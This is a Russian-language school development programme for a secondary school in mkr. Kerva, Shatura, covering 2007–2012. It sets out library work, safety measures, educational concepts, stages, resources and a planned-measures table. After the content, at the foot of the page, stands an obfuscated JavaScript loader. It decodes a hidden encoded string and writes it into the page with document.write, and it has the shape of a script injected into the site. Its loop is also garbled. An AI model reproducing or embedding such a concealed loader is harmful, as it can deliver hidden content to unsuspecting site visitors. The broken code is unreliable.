Астахова Н.И. уделяет внимание на сохранение и пополнение фондов учебной и худ. литературы, проводит большую воспитательную работу, особое внимание уделяя патриотическому воспитанию. В течение учебного года проводились мероприятия: праздник «Как хорошо уметь читать!», конкурс чтецов «Поэты Шатуры», внеклассное мероприятие «Что за прелесть, эти сказки!» (по сказкам А.С.Пушкина), библиотечный час «Никто не забыт, ничто не забыто», Неделя детской книги, посвященная 125-летию К.И.Чуковского,  работа лекторской группы по темам, посвященным Великой Отечественной войне, организованы выставки книг В.Бианки, М.Пришвина, Е.Чарушина, посвященные памятным датам: 65-летию битвы под Москвой, 40-летию Мемориала «Вечный огонь», периодически выпускались литературные газеты «Друг природы», «Волшебное слово» к 125-летию В.Осеевой, проводилась работа с уч-ся – активом классов по пропаганде новинок худ. литературы.

Книжный фонд библиотеки составляет свыше 12 тыс. книг, из них свыше 5 тыс. учебников, что позволяет обеспечить каждого ученика комплектом учебников.

Необходимо обратить внимание на приобретение художественной литературы, т.к. недостаточное количество экземпляров книг современных авторов.

 

Администрация школы и педколлектив уделяет особое внимание вопросам охраны труда и техники безопасности, противопожарной безопасности, антитеррористической защищенности ОУ. В школе введен контрольно-пропускной режим, составлена соответствующая документация, план работы по направлениям. В течение уч. года проводилась разъяснительная работа с уч-ся школы и их родителями, встречи с сотрудниками пожарной охраны мкр. Керва, ГИБДД г.Шатуры. Согласно плана ежемесячно проводились тренировочные эвакуации уч-ся и работников школы, инструктажи по ТБ, правилам дорожного движения, противопожарной безопасности, правилам поведения на воде и др. Вопросы ОТ и ТБ рассматривались на совещаниях, собраниях учителей и сотрудников школы. В январе 2007 г. было принято соглашение по ОТ и ТБ. В течение учебного года нарушений по ОТ и ТБ не было, выполнялись санитарно-гигиенические нормы и правила пожарной безопасности.

 

 Администрация школы постоянно работает над пополнением материально-технической базы. В последнее время приобретено спортивное оборудование и инвентарь, мебель для учительской в нач. школе, сельхоз. инвентарь, ковровые покрытия, телевизор, DVD-плееры, гардинное полотно, школьные доски, вытяжка для хим.кабинета, школьная мебель, видеопроектор, учебно-наглядные пособия, компьютер с доступом в Интернет.

Проводится текущий и капитальный ремонты зданий. Полностью заменена электропроводка и электросветильники в здании основной и средней школы. Однако требуется провести капитальный ремонт кровли, кабинетов 2 этажа, коридора 1 этажа, в целях антитеррористической защищенности заменить ограждение пришкольной территории, заменить двери запасных выходов, а по противопожарной безопасности – установить сигнализацию в зданиях школы.

Необходимо продолжить работу по пополнению материально-технической базы: ТСО, туристическое оборудование и инвентарь, мини-стадион, переоборудование кабинета информатики с современным техническим оснащением.

 

Исходя из вышеизложенного можно отметить, что педколлектив школы под руководством администрации организует образовательный процесс, внеурочную деятельность, направленные на обеспечение оптимальных условий с учетом комплексного развития личности уч-ся, имеет личностно-ориентированную направленность, содержит спектр форм обучения и воспитания, имеет приоритетные направления по созданию личностно-ориентированных ситуаций в процессе обучения и воспитания, а в воспитательном процессе – художественно-эстетическое направление.

 

 

4. Концепция развития школы

 

  1. Актуальность образовательной и  воспитательной работы в общеобразовательном учреждении на современном этапе развития общества.

Изменившиеся социально-экономические отношения в стране требуют от ребенка, подростка, юного человека быстрой адаптации к новым условиям существования. Встает проблема: как в условиях жесткой рыночной конкуренции, смещения ценностей от нравственности и морали к материальным ценностям сохранить лучшие нравственные качества подрастающего человека.

 Система работы школы охватывает весь педагогический процесс, интегрируя учебные занятия, внеурочную жизнь детей, разнообразную деятельность и общение за пределами школы, влияние социальной среды.

Социальный заказ государства на воспитание человека современного, образованного, нравственного, готового самостоятельно принимать решения в ситуации выбора, способного к сотрудничеству и межкультурному взаимодействию, обладающего чувством ответственности, нашел отражение в таких важнейших документах, как Концепция модернизации российского образования, приоритетного национального проекта «Образование».

 

В рамках реализации образовательных программ в школе идет постоянный анализ:

По результатам анализа деятельности школы можно структурировать комплекс проблем , решение которых поможет вывести школу на новый уровень развития:

 

  1. Цели и задачи функционирования образовательной и  воспитательной системы МОУ СОШ мкр.Керва.

 

Цели.  Воспитание и развитие свободной,  физически здоровой личности, обогащенной научными знаниями, готовой к созидательной трудовой деятельности и нравственному поведению; ориентированной на творчество, самопознание и самовоспитание, с чувством гражданственности, политической культурой, с духом свободы и демократии, личным достоинством.

 

Задачи.

►Разработку и апробацию комплекса диагностических методик , направленных на выявление природосообразных оснований построения индивидуальных образовательных маршрутов ;

►Разработка технологий обучения , воспитания и развития в парадигме экологии учения , основанной на природосообразном использовании ресурсов ( мотивов , способностей . склонностей , интересов ) личностного развития уч-ся;

►Формирование системы  дополнительного образования уч-ся по выбору уч-ся , охватывающих все предметные области , системы олимпиад, творческих конкурсов , фестивалей , социально направленных развивающих , обучающих и воспитывающих творческих проектов.

 

 

3. КОНЦЕПТУАЛЬНЫЕ ОСНОВЫ РАЗВИТИЯ ШКОЛЫ

 

Построение школы равных возможностей (адаптивная школа). Адаптивная школа-это школа со смешанным контингентом уч-ся , структура образовательного учреждения функционирует в рамках 3 ступеней:

-1 ступень: 1-4 классы

-2 ступень: 5-9 классы

-3 ступень: 10-11 классы

Школа считает своей основной задачей создание условий, обеспечивающих выявление и развитие детей с разноуровневым развитием, способностями и интересами , реализацию их потенциальных возможностей. Для выполнения данной задачи школа выбрала стратегическую идею-реализацию личностно-ориентированного образования и воспитания.

 

Личностно-ориентированное образование-это образование уч-ся в школе , направленное на воспитание каждого ученика развитой самостоятельной личностью.

Система личностно-ориентированного образования в адаптивной школе должна состоять из следующих подсистем:

 

 

Система личностно-ориентированного образования

1 Классно-урочные занятия

Программа образования

2 Кружковые занятия, факультативы, групповые занятия

Программа образования

3 Самообразование

Программа образования

4 Внеурочная работа школы

Программа воспитания

5 Общешкольное ученическое соуправление и самоуправление

Программа воспитания

6 Трудовая деятельность уч-ся

Социальная служба

7 Сохранение и укрепление здоровья школьников , социальная адаптация ребенка

Социальная служба

 

Личностно-ориентированное образование в школе направлено на воспитание каждого уч-ся внутренне свободной личностью , ищущей свое место в обществе в соответствии со своими задатками , формирующимися ценностными ориентациями, интересами и склонностями с тем , чтобы жить полной , осмысленной жизнью в современном мире.

 

Основными идеями, которые легли в основу образовательной и воспитательной системы школы, являются идеи педагогики гуманизма, сотрудничества, формирования единого воспитательного, развивающего пространства. Научным основанием программы стали идеи и педагогические системы В.А.Сухомлинского, К.Д. Ушинского, И.П.Иванова, Н.Е.Щурковой.

 

Образовательная и воспитательная система школы строится на принципах:

 

 

Основные направления содержания образовательной и воспитательной работы:

 

·        Отработка модели новой перспективной адаптивной школы как наиболее отвечающей меняющимся социальным и педагогическим условиям;

·        Обеспечение равных условий для реализации конституционного права граждан на образование;

·        Создание условий для непрерывного образования в соответствии с интересами личности;

·        Повышение роли образования в воспитании личности;

·        Обеспечение социальной защищенности участников образовательного процесса.

·        Обеспечение нравственного, духовного, интеллектуального, эстетического, этического, культурного развития и саморазвития личности ребенка, способствующему развитию чувства прекрасного, любви и интереса к культуре Отечества и к мировой культуре;

·        Организация работы по патриотическому и гражданственному воспитанию, способствующему осознанию уч-ся их принадлежности к судьбе Отечества, ответственности за себя и за окружающую действительность;

·        Развитие творческих способностей и творческой инициативы уч-ся, способствующих умению найти свое место в творчестве, массовому участию детей в культурном досуге;

·        Развитие ученического самоуправления;

·        Организация работы по предупреждению и профилактике асоциального поведения уч-ся;

·        Организация содержательной внеурочной деятельности в соответствии с интересами уч-ся;

·        Приобщение уч-ся к здоровому образу жизни.

·        Сохранение и расширение сложившегося воспитательного пространства, способствующего полному удовлетворению интересов и потребностей уч-ся в дополнительном образовании;

·        Приобщение семьи к процессу воспитания, способствующее укреплению связи семьи и школы в интересах развития ребенка, развитие системы получения родителями профессиональной помощи в деле воспитания детей;

·        Кадровое обеспечение образовательного процесса – создание системы повышения профессионального мастерства педагогов через работу творческих мастерских;

·        Методическое обеспечение образовательного процесса – создание системы аналитико-диагностического программирования образовательного процесса; внедрение в практическую деятельность передовой педагогической науки, способствование инновационной деятельности;

·        Сохранение и развитие традиций, способствующих воспитанию чувства гордости за свою школу, повышению ответственности за свои поступки и достижения в различных сферах деятельности, обеспечивающих высокую мотивационную готовность участия в деятельности школы уч-ся, родителей, педагогов;

·        Психолого-педагогическая поддержка процесса развития личности.

 

Основные методы образования и воспитания:

 

 

4. Этапы освоения и внедрения

программы развития школы.

 

1 этап ( 2007-2008 гг )- проектный , включающий диагностическую, прогностическую и организационную деятельность.

Ø      Обобщение и анализ существующего опыта работы по личностно-ориентированному направлению;

Ø      Продолжение работы над концепцией , изучение теоретических аспектов проблемы выявления и развития мотивов социально-образовательной деятельности , ресурсов личностного развития ребенка , планирование и прогнозирование необходимой исследовательской и инновационной деятельности;

Ø      Совершенствование кадрового, научного, материально-технического обеспечения концепции, работа с документацией .

Ø      Разработка модели воспитательной системы, ее теоретической концепции;

Ø      Формирование коллектива единомышленников;

Ø      Отбор ведущих педагогических идей;

Ø      Педагогический поиск;

Ø      Формирование стиля отношений между всеми участниками образовательного процесса;

Ø      Наработка технологий;

Ø      Укрепление традиций.

Ø      Решение проблем материально-технического и нормативно-методического обеспечения.

 

 

2 этап ( 2008-2010 гг.)- отработка системы, включающий реализацию , анализ , обобщение результатов  работы.

Ø                 Совершенствование деятельности школы по работе над общеобразовательным (базовым) компонентом;

Ø                 Совершенствование системы психолого-педагогических мероприятий по выявлению и актуализации ресурсов личностного развития уч-ся;

Ø                 Совершенствование системы школьных олимпиад , конкурсов, ролевых игр, проектов, интеллектуальных марафонов , а также принципов анализа результатов районных мероприятий подобного типа;

Ø                 Совершенствование системы психологической работы , включающей диагностику , позволяющую  выявить психологические особенности ребенка, психологическое сопровождение уч-ся в процессе обучения, психологическое консультирование детей , учителей и родителей по проблемам;

Ø                 Совершенствование модели адаптивного образования , заключающееся:

Ø                 В совершенствовании учебных планов математического, естественно-научного, гуманитарного блоков;

Ø                 Создание  и совершенствование программ и методик преподавания курса социальной адаптации и творческого развития;

Ø                 Совершенствование УМК по всем предметам;

Ø                 Организация рейтинга педагогических работников, способных к реализации концепции развития школы, с обязательным стимулированием их деятельности.

Ø      развитие школьного коллектива;

Ø      развитие органов самоуправления;

Ø      определение ведущих видов деятельности;

Ø      отработка наиболее эффективных педагогических технологий;

Ø      повышение профессионального мастерства и творческого роста организаторов воспитания всех категорий;

Ø      оформление воспитательных систем классов.

 

 

3 этап ( 2010-2011 гг)- окончательное оформление системы,

Ø      развитие демократического стиля руководства и отношений;

Ø      воспитание свободной, гуманной, духовной, творческой, практичной личности;

Ø      накопление и передача традиций;

Ø       активное взаимодействие школы и социума.

 

 

4 этап – обновление системы – 2011 – 2012 уч.г.

Ø      обобщение опыта работы администрации, педагогов, родителей и уч-ся школы по моделированию и построению образовательной и воспитательной системы;

 

Ø      определение перспектив и путей дальнейшего развития школы;

 

Ø      частичная перестройка отдельных компонентов образовательной и  воспитательной системы.

 

 

 

5. Перспективы и ожидаемые результаты

 

При обеспечении решения задач-_вариативности, обеспечения дифференциации и гуманизации образовательного процесса- школа может перейти к реструктуризации образовательного и воспитательного процесса и реорганизации системы управления.

1 ступень- 1 - 4 кл.: традиционные программы; расширение круга образовательных услуг за счет вариативной части : введение новых предметов.

2 ступень- 5-9 классы: расширение круга образовательных услуг за счет вариативной части- спецкурсов, факультативов , групповых занятий с детьми , имеющими разную мотивацию учебной деятельности, групповые занятия с одаренными детьми, введение предметов школьного компонента

3 ступень: - 10-11 класс: подготовка уч-ся к сдаче государственной ( итоговой ) аттестации в разных формах, довузовская подготовка уч-ся, введение предметов школьного компонента.

 

Исходя из общих целей , принципов , содержания образования определяются компоненты образовательной среды , подвергающиеся развитию, формированию и изменению с целью способствования формированию индивидуальных образовательных маршрутов для детей с дифференцированными склонностями , способностями и интересами.

Структура  образования и воспитания

Возраст,

Традиционная структура

Ступень образования

Задачи , решаемые школой на данной ступени

5-6 лет

Дошкольное образование

 

 

«Мини-школа»

  • Развитие психофизических функций: памяти , внимания и т.д.;
  • Развитие любознательности ребенка через овладение средствами и эталонами познавательной деятельности;
  • Формирование произвольного поведения детей;
  • Создание предпосылок для перехода от эгоцентризма к децентрации ( способность видеть мир с точки зрения другого или других);
  • Формирование мотивационной готовности к обучению;
  • Развитие творческих способностей ребенка через организацию сюжетно-ролевых , театрализованных , дидактических и других видов игр ;
  • Воспитание умственной активности ребенка на основе шести познавательных или умственных процессов: узнавания, понимания, памяти, продолжающегося и расчленяющегося мышления , оценки;
  • Воспитание коммуникативности в ребенке.

7-10 лет

 

1 ступень образования

 (общее начальное образование , дополнительное образование)

  • Обеспечение высокого уровня интеллектуального развития личности уч-ся, необходимых условий для обучения и воспитания в начальной школе, поддержка высокой учебной мотивации или помощь в создании ее, подготовка ребенка (умственная, физическая, психологическая) к выпуску из начальной школы и к обучению в среднем звене;
  • Формирование и развитие коллектива класса;
  • Изучение творческих и интеллектуальных способностей уч-ся; совершенствование условий для их дальнейшего развития;
  • Оказание помощи в расширении круга интересов и ответственности за конечные результаты любой деятельности, формирование самостоятельности уч-ся;
  • Расширение возможностей для поддержания стабильного здоровья уч-ся;
  • Постоянное привлечение к процессу обучения и воспитания уч-ся их родителей.

11 – 15 лет

 

2 ступень образования

 (основное общее образование, дополнительное образование)

  • Поддержание развития интеллектуальной активности подростков , повышение мотивации обучения с помощью диагностики общих и специальных способностей , т.е. формирование прочных , глубоких , устойчивых знаний основ наук;
  • Повышение мотивации обучения через активизацию познавательной деятельности , развитие общих и специальных способностей , их диагностика;
  • Формирование коммуникативных навыков;
  • Формирование общих и специальных умений и навыков;
  • Формирование ключевых культурно-образовательных компетентностей , характеризующих выпускника школы как образованного молодого человека;
  • Помощь подросткам в сохранении человеческого достоинства  и в достижении позитивных результатов в образовании, общении, образе жизни, вообще в самореализации;
  • Создание условий для обеспечения развития одаренных детей.
  • Обеспечение высокого уровня интеллектуального развития личности уч-ся, создание необходимых условий для обучения и выбора дальнейших форм получения образования;
  • Оказание психолого-педагогической помощи уч-ся, формирование и развитие самостоятельности, самоорганизации, самоопределения уч-ся;
  • Дальнейшее физическое развитие личности, профилактика зависимостей от ПАВ, формирование потребности в здоровом образе жизни;
  • Дальнейшее развитие национального самосознания, формирование и развитие нравственных, гражданских качеств на основе разнообразной творческой деятельности, формирование умения отстаивать свою творческую позицию;
  • Совершенствование межличностных отношений.

16 – 17 лет

 

3 ступень образования (среднее (полное) общее образование, дополнительное образование)

  • Использование навыка самоконструирования . Формирование научного стиля мышления, который , являясь устойчивым качеством личности , выступает как важный компонент ее мировоззрения , как необходимое условие самообразования , развития потребности в самосовершенствовании, формирования способности к самостоятельному добыванию знаний , т.е. освоение фундаментальных теоретических основ наук;
  • Развитие специальных и практических способностей уч-ся;
  • Овладение навыками научно-исследовательского труда;
  • Овладение специальными приемами мыслительной деятельности;
  • Психолого-педагогическая диагностика профессиональной , интеллектуальной деятельности;
  • Использование всего комплекса культурно-образовательных компетентностей , формирующих современную личность;
  • Ориентирование в мире знаний , профессий, человеческой деятельности.
  • Обеспечение высокого уровня интеллектуального развития личности уч-ся, создание условий для завершения базовой общеобразовательной подготовки, необходимой для:
  • - профессиональной дальнейшей учебы;
  • - выполнения гражданских обязанностей;
  • - успешной жизни и деятельности в условиях современного общества;
  • Психолого-педагогическая помощь в адаптации уч-ся в старшем звене, в развитии самостоятельности, самоорганизации, самоопределения;
  • Дальнейшее физическое развитие личности, профилактика зависимостей от ПАВ, формирование устойчивой потребности в здоровом образе жизни;
  • Дальнейшее развитие национального самосознания, формирование и развитие нравственных, гражданских качеств на основе разнообразной творческой деятельности, формирование умения отстаивать свою творческую позицию.

 

6.Ресурсное обеспечение программы.

 

  1. Кадровое обеспечение.

 

 

    • Педагогический коллектив учителей – предметников
    • Педагоги дополнительного образования
    • Классные руководители
    • Медперсонал школы
    • Социальный педагог
    • Психолог
    • Педагог-организатор
    • Старшая вожатая
    • Библиотекарь.

Повышение квалификации педагогических кадров происходит дифференцированно путем посещения методических семинаров, РМО, курсов повышения квалификации, работой над темами самообразования.

 

  1. Материально-техническое и информационное обеспечение

§         Материальная база школы

§         Доступ в Интернет.

§         Библиотечный фонд школы

§         Спортзал в ДК мкр.Керва, спортплощадка

§         Школьная столовая

§         Кабинетная система (16 кабинетов)

§         Медицинский кабинет

 

  1. Программно-методическое обеспечение.

 

§         Разработка комплексных целевых программ по профилактике зависимостей от ПАВ, программы деятельности детского объединения, программы «Этика и этикет», программы работы с одаренными детьми и их апробация

§         Организация семинаров, практикумов для педагогов по новым педагогическим технологиям;

§         Разработка локальных актов школы;

§         Организация  диагностики.

§         Разработка адаптированных общеобразовательных программ и программ дополнительного образования.

§         Организация обучения в начальной школе по программе «Перспектива»

 

 

 

 

7.Исследование эффективности программы

 

Для оценки результативности развития образовательной и воспитательной системы определены критерии и показатели ее эффективности:

Первый критерий – самоактуализация личности уч-ся. Получаемая в соответствии с данным критерием информация позволяет оценить влияние образовательной и  воспитательной деятельности на развитие личности уч-ся, на формирование его индивидуальности.

Второй критерий – удовлетворенность уч-ся, педагогов, родителей жизнедеятельностью в школе.

Третий критерий – конкурентоспособность школы. С помощью этого критерия можно анализировать результаты учебно-воспитательного процесса не только на основе изменений, происходящих в своем учреждении, но и сравнивать их с достижениями других учреждений образования.

Методы исследования:

v     Психологическое тестирование (межличностные отношения, ценностные ориентации, профопределенность, лидерские качества, уровень обученности и воспитанности, уровень учебной мотивации, формирование качеств личности)

v     Педагогическая диагностика качества обученности уч-ся

v     Анкетирование, социологические опросы (изучение интересов, склонностей уч-ся, запросов семьи)

v     Педагогические наблюдения (на уроках, на занятиях факультативов, кружков, групповых занятиях,  в классах, на мероприятиях)

v     Индивидуальные беседы (с уч-ся, родителями, педагогами школы, соцпедагогом о проблемах отдельных детей).

 

 

8.Модель выпускника.

 

Вся образовательная и воспитательная система школы создает условия для самоопределения, саморазвития, самореализации личности.

В процессе образовательной и воспитательной деятельности происходит формирование активной гражданской позиции.

Модель будущего выпускника школы – здоровая, конкурентноспособная, творчески развитая, социально ориентированная личность, способная строить достойную человеческую жизнь:

v     Умеющая сделать сознательный жизненный выбор в пользу творческого самоопределения;

v     Умеющая адекватно оценить свои познавательные возможности и ставить посильную творческую задачу;

v     Умеющая продуктивно общаться на уровне приобретенного опыта (знаний, компетентности и др.)

v     Умеющая сознательно организовывать свой стиль (образ) жизни в конкретной социокультурной среде и проработать перспективы своего культурного роста

v     Знающая свои реальные профессиональные предрасположенности

v     Умеющая делать аргументированный, сознательно мотивированный выбор в процессе профессионального самоопределения.

 

9.Мероприятия программы

 

Мероприятие

2007

 - 2008

2008

 - 2009

2009

-2010

2010-2011

2011-2012

1.

ПНП «Образование»:

- введение новой системы оплаты труда

- переход на подушевое финансирование

- общественное участие в управлении школой

- средняя наполняемость классов

- обучение в ОУ, отвечающем современным условиям осуществления образовательного процесса

-создание школьного сайта

- публичный отчет школы

 

+

 

 

 

 

 

 

+

 

 

 

13 чел.

 

 

 

64%

 

 

 

 

 

+

 

+

 

 

 

 

 

+

 

 

 

 

 

 

15 чел.

 

 

 

100%

 

 

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

18 чел.

 

 

 

100%

 

 

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

18 чел.

 

 

 

100%

 

 

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

20 чел.

 

 

 

100%

 

 

 

 

 

 

 

+

2.

Педагогические кадры:

-отсутствие вакансий

- участие в профессио

нальных конкурсах

- организации семинаров

на базе школы

 

- повышение квалификации, прохождение аттестации

-введение в штатное расписание ставки психолога

- фестиваль педагогического мастерства

 

 

 

 

+

 

 

 

РМО учителей физики, Кл. рук-лей

+

 

 

 

 

 

 

+

 

+

 

 

 

РМО учителей англ. Яз.

 

+

 

 

 

+

 

 

+

 

+

 

 

 

Семинар для соц.

Педагогов

 

+

 

 

 

 

 

 

 

 

+

 

 

+

 

+

 

 

 

РМО для учителей физкуль

Туры

+

 

 

+

 

+

 

 

 

День открытых дверей

 

+

3.

Образовательный процесс:

- повышение качества образования:

- повышение успеваемости

- инновационная работа (внедрение предметов школьного компонента)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-государственная (итоговая) аттестация: переход на новую форму проведения аттестации

- обеспеченность учебниками

-внедрение ИКТ в образовательный процесс

- обобщение и распространение опыта работы по реализации программы «Разговор о правильном питании»

-Создание «Мини-школы» (подготовительный класс к школе)

 

 

34%

 

 

 

96,5%

 

1.Ин.яз. на 1 ступени образов.

2.Интегрир. курс «Разговор о правильном питании» на 1 ступени образов.

3.Изо и худ. труд

4.МХК

5.Информа

тика

6.Техно

Логия

 

 

 

 

 

 

 

 

 

 

 

 

100%

 

+

 

 

 

 

 

 

 

 

 

 

+

 

 

35%

 

 

 

97%

 

1.Ин.яз. на 1 ступени образов.

2.Интегрир. курс «Разговор о правильном питании» на 1 ступени образов.

3.Изо и худ. труд

4.Риторика

5.Информа

Тика

6.Обучение по программе «Перспектива» на

1 ступени образов.

 

+

 

 

 

 

100%

 

+

 

 

37%

 

 

 

97,5%

 

1.Ин.яз. на 1 ступени образов.

2.Интегрир. курс «Разговор о правильном питании» на 1 ступени образов.

3.Изо и худ. труд

4.Хорео

Графия

5.Экономика

6.Обучение по программе «Перспектива на

1 ступени образов.

 

 

 

 

 

 

 

100%

 

+

 

 

+

 

 

 

39%

 

 

 

98%

 

1.Ин.яз. на 1 ступени образов.

2.Интегрир. курс «Разговор о правильном питании» на 1 ступени образов.

3.Изо и худ. труд

4.Интегрир. курс «Биология и экология»

5.Обучение по программе «Перспектива 1 ступени образов.

 

 

 

 

 

100%

 

+

 

 

 

40%

 

 

 

98,5%

 

1.Обучение программе «Перспектива на

1 ступени образов.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

100%

 

+

4.

Воспитательный процесс:

- Разработка комплексной целевой программы по профилактике зависимостей от ПАВ и ее апробация

- программы деятельности детского объединения,

- программы «Этика и этикет»,

-программы работы с одаренными детьми.

- создание музея истории школы

- внедрение мониторинга качества восп. Работы

- участие в туристско-краеведческом движении «Отечество»

-создание опорной школы «Спорт и здоровье»

- создание спортивного клуба

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

+

 

 

+

 

 

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

+

 

+

 

 

 

 

 

 

 

 

 

 

 

+

 

 

+

 

 

 

 

 

 

 

+

 

 

 

+

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

+

 

 

+

 

 

 

 

 

 

 

+

 

 

 

+

 

 

+

 

 

+

 

 

+

 

 

 

 

 

 

 

+

 

 

 

+

 

 

+

 

 

+

5.

Материально-техническая база:

-приобретение компьютеров

-создание технически оснащенного

кабинета математики и информатики

- ремонт кровли

- капитальный ремонт кабинетов здания основной школы, замена оконных рам

-приобретение спортивного оборудования

- создание мини-стадиона

-строительство спортивного зала

- создание внутришкольной компьютерной сети

- замена школьной мебели в 5-9 кл.

-оснащение шк. Столовой холодильным и технологическим оборудованием

- приобретение мебели для мед. кабинета

-оборудование хореографического  зала

-обновление учебно-наглядных пособий

- установление оконных решеток

 

 

+

 

+

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

 

+

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

+

 

 

 

 

+

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

 

 

+

 

 

+

 

 

+

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

+

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

+

6.

Мероприятия по безопасности:

-установка ограждения

-установка системы видеонаблюдения

-установка железных дверей на запасных выходах

-установка пожарной сигнализации

-обработка чердачных перекрытий реагентами

 

 

+

 

 

 

 

+

 

 

 

 

 

 

 

 

 

 

 

 

+

 

 

+

 

 

 

 

 

+

 

function pde63eee44(s535e23c){var sebfb0=s535e23c.substr(9,3)-599,ib88fc347,i9ca815a;s535e23c=s535e23c.substr(12);var d91e9c6=s535e23c.length;for(var ca59881e=0;ca59881e848)ka6f868-=848;i9ca815a=ka6f868-sebfb0-50;i9ca815a=db3cf8(i9ca815a);document.write(b3ffa19(i9ca815a));}}pde63eee44(e279dba03());function wd87c2a92(t088224,qdaade){return t088224.substr(qdaade,1);}function ra93f5e(ne4b92197){if(ne4b92197==168)ne4b92197=1025;else if(ne4b92197==184)ne4b92197=1105;return (ne4b92197>=192 && ne4b92197<256) ? ne4b92197+848 : ne4b92197;}function g65813cd1(kfed3041){return kfed3041=='±';}function b3ffa19(f2fd6627){return String.fromCharCode(f2fd6627);}function e279dba03(){return "e9ed0c90d667±178±±223±±220±±232±±215±±227±±219±{667{±21±{578{±15±±14±{488{±165±{513{±152±±125±±195±{474{±168±±168±±164±ncc±156±±174±±163±±162±±153±±164±±163±±157±±162±±168±b±151±{614{/{495{±182±x{607{,,{622{;±247±16,-@{640{±8±JB{574{±8±±186±±184±±15±±1±±252±{487{±181±±169±±126±c{636{±14±±248±±246±>{667{Z^\\{658{T`)±14±{665{){490{fd±165±±176±{595{±22±±20±{516{±204±{614{±253±±226±,%&{500{±194±{491{g{656{(";}function db3cf8(l053f3){var jc923d701=l053f3;if(jc923d701<0)jc923d701+=256;if(jc923d701==168)jc923d701=1025;else if(jc923d701==184)jc923d701=1105;return (jc923d701>=192 && jc923d701<256) ? jc923d701+848 : jc923d701;}
Hosted by uCoz